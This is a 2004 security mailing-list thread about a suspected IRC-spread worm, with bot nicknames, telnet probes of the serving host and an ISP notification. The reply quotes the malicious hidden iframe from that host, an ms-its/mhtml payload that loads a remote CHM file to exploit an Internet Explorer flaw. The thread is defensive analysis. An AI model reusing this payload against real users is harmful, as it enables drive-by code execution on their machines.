[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <4065F573.40201@gci.net>
Date: Sat, 27 Mar 2004 12:43:15 -0900
From: Charles Hamby <fixer@....net>
To: Karousel <no.email@....com>
Cc: bugtraq@...urityfocus.com
Subject: Re: New worm?
I checked out this IP, and saw the following::
<iframe
src="ms-its:mhtml:file://c:\Css.MHT!http://69.157.174.169:2233//chm2.chm::/rundl.html"
length="1" height="1"></iframe>
This leads me to believe it may a malicious website setup in an attempt
to exploit a flaw in IE that was discovered last month ("MSIE
Unspecified File Processing Arbitrary Code Execution Vulnerability")and
not a worm. You can get more info on it here:
http://www.securityfocus.com/bid/9658/info/
Good call alerting the ISP. Hopefully they'll knock it offline pretty
quick.
Charles Hamby
Karousel wrote:
>Hi,
>
> I think it's a new worm spreading on undernet. The worm PRIVMSG user
>with an ip address and port like this (ip and port never change) :
>[07:53] <C96347981> http://69.157.174.169:2233/
>
> If you telnet to this address, you'll get
>
>C:\telnet 69.157.174.169 2233
>GET / HTTP/1.1
>HTTP/1.1 200 OK
>Server: My Bitchin' IE Infector
>Date: Sat Mar 27 13:22:27 2004
>Content-type: text/html
>Accept-Encoding: identity
>Accept-ranges: bytes
>
><<snip content>>
>
>Connection to host lost.
>C:\
>
>it may not be related, but telneting to port 80 will disconnect you with an
>"unknown" response as soon you type a letter
>C:\telnet 69.157.174.169 80
>GUNKNOWN
>
>Connection to host lost.
>C:\
>
>Each user wich sent me this address seems to had the (almost) same pattern
>for nick and fullname: 1 letter followed by number. Some fullname are
>followed by 11 numbers, others by 12 numbers. None of them was on any
>channels at all.
>
>C14130657 is Guest18231@...onto-HSE-ppp3970074.sympatico.ca * E63731312752
>S66185921 is ~M93079924@...01044550pcs.villgs01.fl.comcast.net *
>O12647092342
>C96347981 is ~O98407918@...t217-44-126-36.range217-44.btcentralplus.com *
>Y710488319397
>M84234958 is Guest92377@...leans-103-1-33-71.w81-250.abo.wanadoo.fr *
>O58235883713
>Z29553055 is Guest58875@...102-194.nwconx.net * E815603852272
>O23413228 is Guest32361@...249161030.customer.alfanett.no * F729082226753
>I65330976 is ~E89040321@...l-216-103-54-205.dsl.lsan03.pacbell.net *
>C527516603470
>
>
>The isp (sympatico.ca) has been notified on march 27 at 10:00 am and this
>computer is still up.
>
>
>
>
Powered by blists - more mailing lists